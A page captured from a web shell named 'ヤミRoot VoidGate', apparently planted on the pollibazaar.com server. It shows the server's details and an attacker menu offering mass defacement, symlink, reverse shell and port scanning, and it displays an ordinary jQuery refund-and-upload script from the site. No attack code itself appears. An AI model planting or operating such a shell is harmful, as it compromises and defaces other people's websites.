ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
public
/
assets
/
front-end
/
js
/
Viewing: account-order-details.js
"use strict"; $('.action-get-refund-details').on('click', function (){ let route = $(this).data('route'); getRefundDetails(route) setTimeout(function (){ $('#refund_request').modal('hide'); },300); }) function getRefundDetails(route) { $.get(route, (response) => { if(response.status == 1) { $("#refund_details_field").html(response.view); $('#refund_details_modal').modal().show(); }else{ toastr.error(response.message); } }) } $('.action-digital-product-download').on('click', function (){ let link = $(this).data('link'); digitalProductDownload(link); }) function digitalProductDownload(link) { $.ajax({ type: "GET", url: link, responseType: 'blob', beforeSend: function () { $('#loading').show(); }, success: function (data) { if (data.status == 1 && data.file_path) { downloadFileUsingFileUrl(data.file_path) } }, error: function () { }, complete: function () { $('#loading').hide(); }, }); } let selectedFiles = []; $(document).on('ready', () => { $(".msgfilesValue").on('change', function () { for (let i = 0; i < this.files.length; ++i) { selectedFiles.push(this.files[i]); } let pre_container = $(this).closest('.upload_images_area'); displaySelectedFiles(pre_container); }); function displaySelectedFiles(pre_container = null) { let container; if (pre_container == null) { container = document.getElementsByClassName("selected-files-container"); } else { container = pre_container.find('.selected-files-container'); } container.innerHTML = ""; selectedFiles.forEach((file, index) => { const input = document.createElement("input"); input.type = "file"; input.name = `images[${index}]`; input.classList.add(`image_index${index}`); input.hidden = true; container.append(input); const blob = new Blob([file], {type: file.type}); const file_obj = new File([file], file.name); const dataTransfer = new DataTransfer(); dataTransfer.items.add(file_obj); input.files = dataTransfer.files; }); pre_container.find(".filearray").empty(); for (let i = 0; i < selectedFiles.length; ++i) { let filereader = new FileReader(); let uploadDiv = jQuery.parseHTML("<div class='upload_img_box'><span class='img-clear'><i class='tio-clear'></i></span><img src='' alt=''></div>"); filereader.onload = function () { let imageData = this.result; $(uploadDiv).find('img').attr('src', imageData); }; filereader.readAsDataURL(selectedFiles[i]); pre_container.find(".filearray").append(uploadDiv); $(uploadDiv).find('.img-clear').on('click', function () { $(this).closest('.upload_img_box').remove(); selectedFiles.splice(i, 1); $('.image_index' + i).remove(); }); } } }); let reviewSelectedFiles = []; $(document).on('ready', () => { $(".reviewFilesValue").on('change', function () { for (let i = 0; i < this.files.length; ++i) { reviewSelectedFiles.push(this.files[i]); } let pre_container = $(this).closest('.upload_images_area'); reviewFilesValueDisplaySelectedFiles(pre_container); }); function reviewFilesValueDisplaySelectedFiles(pre_container = null) { let container; if (pre_container == null) { container = document.getElementsByClassName("selected-files-container"); } else { container = pre_container.find('.selected-files-container'); } container.innerHTML = ""; reviewSelectedFiles.forEach((file, index) => { const input = document.createElement("input"); input.type = "file"; input.name = `fileUpload[${index}]`; input.classList.add(`image_index${index}`); input.hidden = true; container.append(input); const blob = new Blob([file], {type: file.type}); const file_obj = new File([file], file.name); const dataTransfer = new DataTransfer(); dataTransfer.items.add(file_obj); input.files = dataTransfer.files; }); pre_container.find(".filearray").empty(); for (let i = 0; i < reviewSelectedFiles.length; ++i) { let filereader = new FileReader(); let uploadDiv = jQuery.parseHTML("<div class='upload_img_box'><span class='img-clear'><i class='tio-clear'></i></span><img src='' alt=''></div>"); filereader.onload = function () { let imageData = this.result; $(uploadDiv).find('img').attr('src', imageData); }; filereader.readAsDataURL(reviewSelectedFiles[i]); pre_container.find(".filearray").append(uploadDiv); $(uploadDiv).find('.img-clear').on('click', function () { $(this).closest('.upload_img_box').remove(); reviewSelectedFiles.splice(i, 1); $('.image_index' + i).remove(); }); } } });
Coded With 💗 by
0x6ick